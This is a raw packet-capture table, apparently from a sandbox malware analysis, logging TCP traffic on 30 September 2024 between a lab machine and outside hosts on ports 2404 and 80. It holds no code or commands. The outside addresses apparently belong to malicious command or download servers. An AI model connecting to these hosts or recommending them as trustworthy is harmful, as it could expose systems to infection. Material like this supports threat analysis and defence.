                                                                            Sep 30, 2024 09:56:21.017214060 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017225981 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017247915 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017282009 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017296076 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017314911 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017359018 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017364025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017399073 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017431021 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017442942 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017462969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017497063 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017510891 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017539024 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017575979 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017584085 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017606974 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017653942 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.138170958 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.741295099 CEST8049176178.237.33.50192.168.2.22
                                                                            Sep 30, 2024 09:56:21.741363049 CEST4917680192.168.2.22178.237.33.50
                                                                            Sep 30, 2024 09:56:43.460251093 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:43.497559071 CEST491742404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:43.502356052 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:00.456599951 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.461661100 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.461792946 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.472546101 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.477437019 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946851969 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946877003 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946892023 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946908951 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946919918 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946930885 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946942091 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946953058 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946963072 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946974993 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.947012901 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.949240923 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.951827049 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.951873064 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.951884985 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.951915979 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033689022 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033724070 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033761024 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033773899 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033782959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033807039 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033812046 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033839941 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033847094 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033871889 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033879042 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033905029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033911943 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033943892 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034538031 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034569979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034580946 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034603119 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034609079 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034635067 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034640074 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034670115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034674883 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034708977 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035356998 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035398960 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035409927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035442114 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035449982 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035480022 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035480022 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035516024 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035521030 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035553932 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036254883 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036303997 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036305904 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036389112 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036396980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036421061 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036429882 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036454916 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036459923 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036494017 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038784027 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038832903 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038853884 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038897991 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038933992 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038973093 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120678902 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120748997 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120803118 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120836973 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120840073 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120841026 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120877028 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120877028 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120891094 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120934963 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120960951 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121001959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121011972 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121042967 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121054888 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121078968 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121088028 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121114016 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121124983 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121150017 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121156931 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121184111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121200085 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121216059 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121228933 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121248007 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121263027 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121282101 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121293068 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121318102 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121324062 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121352911 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121365070 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121385098 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121396065 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121418953 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121429920 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121452093 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121462107 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121496916 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121507883 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121551037 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121830940 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121875048 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121881008 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121915102 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121925116 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121947050 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121958971 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.121979952 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.121987104 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.122011900 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.122024059 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.122045040 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.122052908 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.122082949 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.202532053 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207526922 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207586050 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207602024 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207634926 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207638025 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207670927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207683086 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207704067 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207710981 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207736015 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207748890 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207768917 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207779884 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207799911 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207809925 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207844019 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.207853079 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207886934 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.207901001 CEST4917780192.168.2.22192.3.220.22
Sep 30, 2024 09:57:01.207920074 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.207930088 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.207961082 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.207971096 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208025932 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208026886 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208070040 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208096027 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208139896 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208149910 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208183050 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208198071 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208226919 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208231926 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208264112 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208275080 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208297014 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208306074 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208329916 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208340883 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208362103 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208372116 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208395004 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208404064 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208429098 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208436966 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208462954 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208472967 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208508015 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208827972 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208873034 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.208920002 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.208961964 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209057093 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209100962 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209108114 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209144115 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209151983 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209184885 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209193945 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209227085 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209239960 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209264994 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209275007 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209300995 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209307909 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209332943 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209343910 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209368944 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209379911 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209402084 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209410906 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209434032 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209443092 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209469080 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.209476948 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.209511995 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210103035 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210136890 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210149050 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210171938 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210182905 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210215092 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210285902 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210319042 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210330009 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210350990 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210362911 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210385084 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210397005 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210417986 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210427046 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210449934 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210464954 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210484982 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210493088 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210516930 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210525990 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210551023 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.210560083 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.210593939 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.211040020 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.211072922 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.211085081 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.211107016 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.211116076 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.211141109 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.211147070 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.211185932 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.213330030 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.213382959 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214391947 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214442015 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214451075 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214485884 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214495897 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214518070 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214529037 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214550972 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214560032 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214584112 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214589119 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214622974 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214636087 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214649916 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.214663029 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.214694977 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.432279110 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.432362080 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.506113052 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.510957003 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.510987997 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511019945 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511051893 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511058092 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511065960 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511068106 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511079073 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511092901 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511097908 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511109114 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511116028 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511127949 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511132956 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511145115 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511152029 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511156082 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511168003 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511169910 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511212111 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511209965 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511225939 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511238098 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511250019 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511260986 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511264086 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
